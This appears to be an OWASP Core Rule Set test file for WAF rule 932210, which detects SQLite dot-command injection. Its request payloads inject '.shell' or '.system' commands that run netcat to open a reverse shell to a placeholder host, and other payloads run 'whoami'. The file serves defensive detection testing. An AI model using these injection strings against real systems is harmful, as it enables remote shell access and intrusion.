---
meta:
  author: "flo405, Franziska Bühler"
  description: SQLite System Command Execution
  enabled: true
  name: 932210.yaml
tests:
  - test_title: 932210-1
    desc: ";\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\n"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Host: localhost
              User-Agent: "OWASP CRS test agent"
            method: GET
            port: 80
            uri: /?foo=;\n.shell%20nc%2010.10.10.1%206666%20-e%20sh\n
            version: HTTP/1.0
          output:
            log_contains: id "932210"
  - test_title: 932210-2
    desc: "%22;\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\n"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Host: localhost
              User-Agent: "OWASP CRS test agent"
            method: GET
            port: 80
            uri: /?foo=%22;\n.%20shell%20nc%2010.10.10.1%206666%20-e%20sh\n
            version: HTTP/1.0
          output:
            log_contains: id "932210"
  - test_title: 932210-3
    desc: ";\n.system%20nc%2010.10.10.1%206666%20-e%20sh\n"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Host: localhost
              User-Agent: "OWASP CRS test agent"
            method: GET
            port: 80
            uri: /?foo=;\n.system%20nc%2010.10.10.1%206666%20-e%20sh\n
            version: HTTP/1.0
          output:
            log_contains: id "932210"
  - test_title: 932210-4
    desc: ";\n.databases"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Host: localhost
              User-Agent: "OWASP CRS test agent"
            method: GET
            port: 80
            uri: /?foo=;\n.databases
            version: HTTP/1.0
          output:
            log_contains: id "932210"
  - test_title: 932210-5
    desc: "Fix N9FKP2XQ: .sh whoami"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Host: localhost
              User-Agent: "OWASP CRS test agent"
            method: GET
            port: 80
            uri: /juiceshop?s=1;.sh+whoami
            version: HTTP/1.0
          output:
            log_contains: id "932210"
  - test_title: 932210-6
    desc: "N9FKP2XQ"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Host: localhost
              User-Agent: "OWASP CRS test agent"
            method: POST
            port: 80
            data: |
              code=1;.\"shell whoami
            uri: /post
          output:
            log_contains: id "932210"
  - test_title: 932210-7
    desc: "N9FKP2XQ"
    stages:
      - stage:
          input:
            dest_addr: 127.0.0.1
            headers:
              Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5"
              Host: localhost
              User-Agent: "OWASP CRS test agent"
            method: POST
            port: 80
            data: |
              code=1;.\'shell whoami
            uri: /post
          output:
            log_contains: id "932210"
